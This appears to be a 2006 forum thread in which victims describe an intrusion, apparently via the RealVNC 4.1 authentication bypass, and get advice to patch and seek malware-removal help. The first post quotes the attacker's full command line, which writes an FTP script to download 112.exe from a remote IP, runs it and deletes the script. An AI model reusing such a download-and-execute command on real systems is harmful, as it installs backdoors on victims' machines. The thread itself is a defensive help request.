Posted: Fri Nov 03, 2006 4:42 pm Post subject: intrusion or virus?
Hi all,
i would like to get some help, my Start > Run box open by itself and i can see this string as someone was typing it in
cmd.exe /c del i&echo open 81.128.84.212 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit
obviusly 81.128.84.212 was my ip address.
I cant get rid of it.
Any help will be very appreciated.
thanks
davide
Posted: Mon Nov 06, 2006 2:04 am Post subject: VNC server running?
Hi Davide,
I also have same problem since Friday. Do you have VNC server on your PC always running? Then disabling it may help.
I found that VNC Server icon on task tray was in Black when I had such problem, as if "somebody" was connecting and playing with my PC
I think it's due to a kind of virus program which is running on my PC and simulating remote control....
Probably it's very new virus and no anti-virus program can detect yet? I tried 2 checking programs (CA and Trend-Micro) but didn't find anything.
Joined: 28 Oct 2002 Posts: 16777215 Location: Chicago, IL US
Posted: Mon Nov 06, 2006 11:37 pm Post subject:
Good times with the RealVNC 4.1 Authentication Bypass Vulnerability
Patching your system should reduce the risk that you'll be compromised again. An attacker can use leverage this issue against you in order to establish a remote session with your PC without knowing your VNC password. This isn't just you.
Post exploitation the attacker appeared to create an FTP script in order to download a utility named 112.exe. This is likely a backdoor/rootkit/nasty nasty thing designed to allow the attacker to maintain control over your machine.
Getting rid of it? Well I've got no idea what 112.exe is but you may want to head over to the HijackThis forum on this site. They're insanely intelligent when it comes to these kinds of things, and maybe they'll be able to help you out.
Posted: Thu Nov 09, 2006 2:41 am Post subject: Intrusion or virus
Hey....
was wondering if there was an update to this. I have been getting the same thing... everytime though it is a diffrent exe file ... on each machine. is there a new worm out that is doing this automated now? seen 3 computers.. diffrent exe file names.... and located in 3 diffrent countries... trying to find a common link between them.
Thanks for any information you can provide. I am at a loss.... I would think VNC ... 4.1.1 but... at least one of the users.... running a firewall on the laptop... plus a hardware firewall/GW and managed to get the same thing....
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum